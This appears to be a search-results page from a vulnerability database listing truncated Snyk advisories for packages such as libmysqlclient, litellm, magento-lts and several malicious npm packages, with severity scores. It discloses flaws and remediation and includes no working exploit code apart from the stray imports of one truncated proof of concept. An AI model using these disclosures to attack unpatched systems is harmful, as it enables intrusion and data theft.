Lucene search
K

32409 matches found

Snyk
Snyk
•added 2026/04/21 12:0 a.m.•4 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation Upgrade libmysqlclient to version...

6.9CVSS5.5AI score0.00323EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•5 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. This is only exploitable if the...

6.9CVSS7.7AI score0.00323EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•4 views

Insertion of Sensitive Information Into Sent Data

Overview Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data via the Information Schema component. An attacker can gain unauthorized access to sensitive data by sending crafted requests over the network. Remediation Upgrade libmysqlclient to versi...

5.3CVSS7.8AI score0.00243EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•8 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the DML component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation Upgrade libmysqlclient to versio...

6.9CVSS7.8AI score0.00323EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•8 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation Upgrade libmysqlclient to...

7.1CVSS7.8AI score0.00303EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•10 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the InnoDB component. An attacker can cause the server to hang or crash repeatedly by sending crafted requests over the network with high privileges. Remediation Upgrade...

6.9CVSS7.7AI score0.00242EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•5 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the JSON component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation Upgrade libmysqlclient to versi...

7.1CVSS7.8AI score0.00303EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•5 views

Missing Release of Resource after Effective Lifetime

Overview Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime in the Group Replication Plugin. An attacker can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation Upgrade libmysqlclient to versi...

7.1CVSS7.8AI score0.00303EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•9 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the InnoDB component. An attacker can cause the server to hang or repeatedly crash by sending crafted requests over the network with high privileges. Remediation Upgrade...

6.9CVSS7.7AI score0.00323EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•5 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation Upgrade libmysqlclient to...

7.1CVSS7.8AI score0.00303EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•5 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the InnoDB component. An attacker can cause the server to hang or repeatedly crash by sending specially crafted requests over the network. This is only exploitable if the attacker...

6.9CVSS7.7AI score0.00242EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/21 12:0 a.m.•7 views

Improper Input Validation

Overview Affected versions of this package are vulnerable to Improper Input Validation of certain client metadata fields when explicitly enabled. An attacker possessing a valid Initial Access Token can dynamically register a malicious client with crafted metadata. Depending on the metadata provid...

9.6CVSS5.4AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 10:16 p.m.•5 views

Access Control Bypass

Overview Affected versions of this package are vulnerable to Access Control Bypass through the authentication process. An attacker can maintain unauthorized access to protected resources and perform actions such as reading, modifying, or creating new accounts by using previously issued bearer...

8.6CVSS5.3AI score0.00274EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:16 p.m.•3 views

Access Control Bypass

Overview Affected versions of this package are vulnerable to Access Control Bypass through the authentication process. An attacker can maintain unauthorized access to protected resources and perform actions such as reading, modifying, or creating new accounts by using previously issued bearer...

8.6CVSS5.3AI score0.00274EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:15 p.m.•4 views

Missing Origin Validation in WebSockets

Overview Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets via missing origin validation in all WebSocket endpoints. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

8.1CVSS5.4AI score0.00176EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:15 p.m.•4 views

Missing Origin Validation in WebSockets

Overview Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets via missing origin validation in all WebSocket endpoints. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

8.1CVSS5.4AI score0.00176EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:15 p.m.•8 views

Missing Origin Validation in WebSockets

Overview Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets via missing origin validation in all WebSocket endpoints. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

8.1CVSS5.4AI score0.00176EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:0 p.m.•4 views

Embedded Malicious Code

Overview pgserve is an Embedded PostgreSQL server with true concurrent connections - zero config, auto-provision databases Affected versions of this package are vulnerable to Embedded Malicious Code that injects a credential-harvesting script that runs via postinstall on every npm install. It...

9.8CVSS5.4AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 10:0 p.m.•6 views

Command Injection

Overview litellm is a Library to easily interface with LLM API providers Affected versions of this package are vulnerable to Command Injection via preview MCP server endpoints POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list. An attacker can execute arbitrary commands by accessin...

8.8CVSS6.2AI score0.75873EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 10:0 p.m.•4 views

Improper Verification of Cryptographic Signature

Overview Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the managed authenticated encryptor while computing HMAC validation tag. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. Note: Shared framework...

9.1CVSS5.9AI score0.11205EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 9:11 p.m.•7 views

Command Injection

Overview flowsint is an Add your description here Affected versions of this package are vulnerable to Command Injection via the orgtoasn transform process. An attacker can execute arbitrary operating system commands as root on the host machine by supplying shell metacharacters and escaping the...

10CVSS6.1AI score0.00506EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 9:0 p.m.•5 views

Allocation of Resources Without Limits or Throttling

Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer. Remediation Upgrade libmysqlclient to version 8.1.0 or higher. References - Oracle Security Advisory - Red Hat Bugzilla Bug...

6.9CVSS7.9AI score0.00323EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 8:12 p.m.•8 views

Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Overview aws-encryption-sdk is an AWS Encryption SDK implementation for Python Affected versions of this package are vulnerable to Selection of Less-Secure Algorithm During Negotiation 'Algorithm Downgrade' via the shared key cache. An attacker can bypass key commitment policy enforcement by...

5.7CVSS5.7AI score0.00096EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•4 views

Symlink Attack

Overview Affected versions of this package are vulnerable to Symlink Attack via the setkey and unsetkey functions. An attacker can overwrite arbitrary files by creating a crafted symbolic link that is followed during a cross-device rename fallback. PoC python import os import sys import tempfile...

7.1CVSS5.9AI score0.00236EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•5 views

Directory Traversal

Overview openmage/magento-lts is a This repository is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Directory Traversal through the files request parameter in the dataflow import parsers. An attacker with administrative privileges can read...

8.5CVSS6.6AI score0.00502EPSS
Exploits1References3
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•6 views

Integer Overflow or Wraparound

Overview Affected versions of this package are vulnerable to Integer Overflow or Wraparound in the kissfftndralloc function due to improper allocation size calculation when handling crafted dimension values. An attacker can execute arbitrary code or cause a denial of service by supplying speciall...

8.8CVSS6.3AI score0.00288EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•3 views

Missing Authorization

Overview openmage/magento-lts is a This repository is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Missing Authorization through the MageWishlistSharedController shared wishlist item flow. An attacker can access or manipulate wishlist ite...

5.4CVSS5.5AI score0.00176EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•6 views

Arbitrary File Upload

Overview openmage/magento-lts is a This repository is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Arbitrary File Upload due to an incomplete blocklist in the file upload process. An attacker can execute arbitrary code on the server by...

8.8CVSS6.1AI score0.00691EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 7:31 p.m.•3 views

Deserialization of Untrusted Data

Overview openmage/magento-lts is a This repository is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Deserialization of Untrusted Data the VarienImage file handling path and related image validation code in VarienImage,...

9.2CVSS6.8AI score0.00539EPSS
Exploits1References2
Snyk
Snyk
•added 2026/04/20 7:30 p.m.•13 views

Permissive Cross-domain Policy with Untrusted Domains

Overview copilot-api is a Turn GitHub Copilot into OpenAI/Anthropic API compatible server. Usable with Claude Code! Affected versions of this package are vulnerable to Permissive Cross-domain Policy with Untrusted Domains via the CORS policy combined with the unauthenticated /token endpoint. An...

7.5CVSS5.8AI score0.00182EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:54 p.m.•7 views

Directory Traversal

Overview com.github.junrar:junrar is a rar decompression library in plain java. Affected versions of this package are vulnerable to Directory Traversal via the LocalFolderExtractor component. An attacker can overwrite files in sibling directories by tricking a user into extracting a specially...

9.3CVSS6.4AI score0.00336EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 5:26 p.m.•7 views

Arbitrary File Upload

Overview Affected versions of this package are vulnerable to Arbitrary File Upload due to concatenating tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. An attacker can cause unintended files to be installed by supplying a specially crafted archi...

5CVSS5.3AI score0.00144EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 3:49 p.m.•8 views

SQL Injection

Overview doris-mcp-server is an Enterprise-grade Model Context Protocol MCP server implementation for Apache Doris Affected versions of this package are vulnerable to SQL Injection due to improper neutralization in the query context handling process. An attacker can execute unintended SQL...

6.9CVSS6.1AI score0.00655EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 3:49 p.m.•4 views

Arbitrary Code Injection

Overview sglang is a SGLang is a fast serving framework for large language models and vision language models. Affected versions of this package are vulnerable to Arbitrary Code Injection via the reranking endpoint when a model file containing a malicious tokenizer.chattemplate is loaded, due to...

9.8CVSS6.4AI score0.00852EPSS
Exploits2References2
Snyk
Snyk
•added 2026/04/20 3:31 p.m.•6 views

Insertion of Sensitive Information into Log File

Overview org.apache.kafka:kafka-clients is a streaming platform that can publish and subscribe to streams of records, store streams of records in a fault-tolerant durable way, and process streams of records as they occur. Affected versions of this package are vulnerable to Insertion of Sensitive...

8.2CVSS5.5AI score0.00535EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 3:31 p.m.•4 views

Improper Validation of Specified Index, Position, or Offset in Input

Overview org.apache.kafka:kafka-clients is a streaming platform that can publish and subscribe to streams of records, store streams of records in a fault-tolerant durable way, and process streams of records as they occur. Affected versions of this package are vulnerable to Improper Validation of...

9.3CVSS5.7AI score0.00581EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 1:39 p.m.•4 views

Malicious Package

Overview tailwind-text-fill is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 1:34 p.m.•6 views

Malicious Package

Overview tailwindthml-flips is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 12:32 p.m.•3 views

Incorrect Privilege Assignment

Overview Affected versions of this package are vulnerable to Incorrect Privilege Assignment in the memosaccesstoken function of the UpdateInstanceSetting component when manipulating the additionalStyle or additionalScript arguments. An attacker can gain unauthorized access to sensitive informatio...

6.5CVSS6.6AI score0.00252EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 11:13 a.m.•7 views

Improper Neutralization of Special Elements in Data Query Logic

Overview Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Data Query Logic in the Asset Handler and Aggregate Handler components. An attacker can access, modify, or disrupt sensitive data by injecting specially crafted elements into data query...

6.5CVSS6.6AI score0.00232EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 9:16 a.m.•3 views

Arbitrary Code Injection

Overview Affected versions of this package are vulnerable to Arbitrary Code Injection via the -env-vars process when multi-step templates are used against untrusted targets. An attacker can execute arbitrary code by injecting malicious DSL expressions. This is only exploitable if multi-step...

7.5CVSS6.1AI score0.00344EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 9:16 a.m.•2 views

Arbitrary Code Injection

Overview Affected versions of this package are vulnerable to Arbitrary Code Injection via the -env-vars process when multi-step templates are used against untrusted targets. An attacker can execute arbitrary code by injecting malicious DSL expressions. This is only exploitable if multi-step...

7.5CVSS6.1AI score0.00344EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:34 a.m.•10 views

Malicious Package

Overview bignum-ts-v2 is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:34 a.m.•6 views

Malicious Package

Overview npm-doc-deploy is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:32 a.m.•5 views

Malicious Package

Overview @tushar-br/file11 is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:32 a.m.•6 views

Malicious Package

Overview @tushar-br/editing-pack is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this packa...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:32 a.m.•10 views

Malicious Package

Overview @tushar-br/desktop is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:31 a.m.•3 views

Incorrect Synchronization

Overview fschat is an An open platform for training, serving, and evaluating large language model based chatbots. Affected versions of this package are vulnerable to Incorrect Synchronization in the form of synchronous invocation of the apigenerate and generategate functions in the Worker API. An...

8.7CVSS5.6AI score0.00623EPSS
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:23 a.m.•5 views

Malicious Package

Overview krdfonts is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package authorship...

9.8CVSS5.7AI score
Exploits0References2
Snyk
Snyk
•added 2026/04/20 6:21 a.m.•6 views

Malicious Package

Overview @otaxayuns/baileys is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

9.8CVSS5.7AI score
Exploits0References2
Total number of security vulnerabilities32409